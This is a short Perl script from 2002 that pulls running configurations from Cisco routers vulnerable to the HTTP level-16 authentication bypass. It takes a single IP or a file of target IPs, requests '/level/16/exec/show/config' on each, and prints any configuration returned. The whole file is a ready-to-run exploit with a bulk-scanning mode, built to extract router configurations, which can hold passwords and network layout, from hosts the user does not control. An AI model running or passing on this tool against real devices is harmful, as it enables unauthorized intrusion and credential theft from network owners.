#!/usr/bin/perl
$|=1;
## (c) th@bogus.net
## cisco HTTP configuration grabber -- well-known cisco exploit
##
## usage: -f <file with ip> or -t <target ip>
##

use Getopt::Long;
use LWP::UserAgent;

$cmd="/level/16/exec/show/config";

GetOptions("h",
	   "f=s" => \$file,
	   "t=s" => \$target);

if($opt_h) {
    print "cisco-grabconfig.pl (c) 2002 th\@bogus.net","\n";
    print "usage: cisco-grabconfig.pl [-h|-f <file>|-t <target>]","\n";
    print "   -h : this drivel","\n";
    print "   -f : file containing target ip's (one per line)","\n";
    print "   -t : target ip","\n";
    print "grabs cisco configurations from hosts vulnerable to the HTTP","\n";
    print "authentication bug (http://www.securiteam.com/securitynews/5PP0L2K4KY.html)","\n";
    exit(1);
}

if($file && $target) {
    print "ERROR: only -f or -t, please","\n";
    exit(1);
}

if($file && -e $file) {
    open(IN,$file);
    while(<IN>) {
	if(/^\s*(\d+\.\d+\.\d+\.\d+)\s*/) {
	    $targets{$1}=1;
	}
    }
    close(IN);
}

if($target) {
    GetConfig($target);
} else {
    foreach $ip (keys %targets) {
	GetConfig($ip);
    }
}

if(!$opt_h && !$target && !$file) {
    print "ERROR: i have no idea what you want (try -h)","\n";
    exit(1);
}

exit(0);

sub GetConfig {
    my($t) = @_;
    my($ua,$request,$response);
    $ua = LWP::UserAgent->new;
    $ua -> agent ("Mozilla/5.0 (CGC (c) 2002 th\@bogus.net)");
    $request = HTTP::Request->new("GET","http://$t/$cmd");
    $response = $ua->request($request);
    $response = $response->content;
    if($response =~ /Using \d+ out of \d+ bytes/) {
	print "\n!! found config on $t:","\n";
	print STDOUT $response;
	print "\n";
    } else {
	print "\n-- no config from $t","\n";
    }
}